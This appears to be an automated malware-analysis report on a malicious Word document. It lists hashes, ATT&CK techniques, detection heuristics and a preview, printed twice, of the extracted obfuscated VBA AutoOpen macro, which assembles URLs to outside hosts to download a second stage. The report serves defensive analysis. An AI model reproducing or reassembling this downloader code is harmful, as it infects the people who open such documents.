Office (OLE) malware analysis — malicious · 17b95ff52924cf21

MALICIOUS

Office (OLE)

165.5 KB Created: 2017-11-29 14:54:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 49bc188d8e01975fd04684abb9e45c0a SHA-1: 82e87efb2ada20fff62818ca5a17639a089de989 SHA-256: 17b95ff52924cf21bafa9137c4c2ca5ec1c9e60223afebd4ae4ecd111773ccb3

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function, indicating an attempt to execute external code. The macro constructs a URL, likely for downloading a second-stage payload. The presence of a password-protected archive lure heuristic suggests the document's purpose is to trick the user into opening an encrypted file, which is a common tactic for bypassing security controls.

Heuristics 8

ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://gXw+gXwtagXw+gXwswines.co In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 84063 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	84063 bytes
SHA-256: `e16455f4221bb363cee00e629f3a88cf5b384e7889854b00aee5a212b80d8581`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HpaCWEKWi" Function wbGowvEQG() jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw")) lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195) BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc")) twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj")) ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa")) zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138) OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp")) aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG")) ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM")) NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2) DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm")) zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI")) DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ")) kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45) kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz")) PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM")) Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA")) WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11) kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev ... (truncated)

SHA-256: e16455f4221bb363cee00e629f3a88cf5b384e7889854b00aee5a212b80d8581

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HpaCWEKWi"
Function wbGowvEQG()
jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw"))
lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195)
BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc"))
twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj"))
ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa"))
zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138)
OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp"))
aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG"))
ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM"))
NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2)
DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm"))
zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI"))
DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ"))
kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45)
kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz"))
PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM"))
Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA"))
WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11)
kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.